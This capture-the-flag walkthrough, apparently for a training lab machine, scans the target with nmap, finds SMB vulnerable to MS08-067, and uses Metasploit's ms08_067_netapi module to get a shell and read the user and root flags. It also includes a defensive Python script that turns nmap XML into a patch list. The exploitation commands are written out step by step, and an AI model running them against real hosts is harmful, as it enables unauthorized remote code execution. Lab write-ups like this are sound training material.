As usual let's start with nmap:
nmap -sV -sC 10.129.1.111
We are told to use -Pn (skip host discovery and scan the host even if it does not answer ping), so let's try that:
nmap -Pn -sC 10.129.1.111
Port 445 is open, which is SMB, so let's check it with:
smbclient -L 10.129.1.111
The share listing doesn't work, so let's move on. Let's use nmap again, this time running its vulnerability scripts against port 445:
nmap -Pn -p 445 --script vuln 10.129.1.111
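As an added example (not part of the original write-up), here is a small Python script that turns the output of a vuln scan like the one above, saved with nmap's -oX option, into a remediation list: which hosts expose port 445, and which of them the smb-vuln-ms08-067 script marked as vulnerable. The XML inside is a constructed sample, not a real scan; the element layout (host/address/ports/port/state/script) is what nmap -oX writes, and the "State:" line is assumed to follow the layout of nmap's vulns library. The point worth noticing is the state check: a plain substring test for "VULNERABLE" would also match "NOT VULNERABLE", so the script reads the State line instead.

```python
"""Summarise an nmap -oX report for defenders: hosts with port 445 open and
hosts the smb-vuln-ms08-067 script flagged as vulnerable (patch list)."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Constructed sample of nmap XML output (not a real scan); script output
# text is abbreviated.  &#10; is a newline inside the attribute value.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="microsoft-ds"/>
        <script id="smb-vuln-ms08-067" output="&#10;  VULNERABLE:&#10;  Microsoft Windows system vulnerable to remote code execution (MS08-067)&#10;    State: VULNERABLE"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <script id="smb-vuln-ms08-067" output="&#10;    State: NOT VULNERABLE"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="10.0.0.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="filtered" reason="no-response"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Matches the "State: ..." line of the vulns library output (assumed layout).
STATE_RE = re.compile(r"State:\s*([A-Z ]+?)\s*$", re.MULTILINE)


def script_state(output: str) -> Optional[str]:
    """Return the State value (e.g. 'VULNERABLE', 'NOT VULNERABLE') or None.
    Reading the State line avoids counting 'NOT VULNERABLE' as a hit."""
    match = STATE_RE.search(output)
    return match.group(1) if match else None


def parse_report(xml_text: str) -> Dict[str, Dict[str, Optional[str]]]:
    """Map each IPv4 host to its port 445 state and ms08-067 script state."""
    root = ET.fromstring(xml_text)
    findings: Dict[str, Dict[str, Optional[str]]] = {}
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        entry: Dict[str, Optional[str]] = {"port445": "closed", "ms08_067": None}
        for port in host.iter("port"):
            if port.get("protocol") != "tcp" or port.get("portid") != "445":
                continue
            state = port.find("state")
            entry["port445"] = state.get("state") if state is not None else "unknown"
            script = port.find("script[@id='smb-vuln-ms08-067']")
            if script is not None:
                entry["ms08_067"] = script_state(script.get("output", ""))
        findings[addr.get("addr", "")] = entry
    return findings


def exposed_smb(findings: Dict[str, Dict[str, Optional[str]]]) -> List[str]:
    """Hosts that answer on TCP 445 (exposure, whether or not vulnerable)."""
    return sorted(ip for ip, f in findings.items() if f["port445"] == "open")


def patch_list(findings: Dict[str, Dict[str, Optional[str]]]) -> List[str]:
    """Hosts the script marked VULNERABLE or LIKELY VULNERABLE."""
    hit = ("VULNERABLE", "LIKELY VULNERABLE")
    return sorted(ip for ip, f in findings.items() if f["ms08_067"] in hit)


if __name__ == "__main__":
    report = parse_report(SAMPLE_XML)
    print("SMB exposed on:", exposed_smb(report))
    print("Patch for MS08-067:", patch_list(report))
```

To use it on a real scan, replace SAMPLE_XML with the contents of the file written by nmap -oX; the filtered host shows up in neither list, which is the expected result for a firewalled machine.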
The scan flags MS08-067, so let's see if Metasploit has an exploit module for it:
msfconsole
Now let's type:
search ms08-067
There is one matching module, so let's use it:
use exploit/windows/smb/ms08_067_netapi
show options
Looks like we only need to set LHOST and RHOSTS, as LPORT and RPORT are already set to their defaults.
set LHOST 10.10.14.10
This is the IP of the attacking machine, so your own IP. If you don't know it, open a new terminal and type ifconfig.
set RHOSTS 10.129.1.111
This is the IP of the remote host, so the target machine.
Type:
exploit
Now we are in!
Type:
cd "Documents and Settings"
ls
cd john
cd Desktop
ls
cat user.txt
Congratulations! You got the user flag!
Now let's go get the root flag. Type:
cd "Documents and Settings"
cd Administrator
ls
cat root.txt
Congratulations! You got the root flag!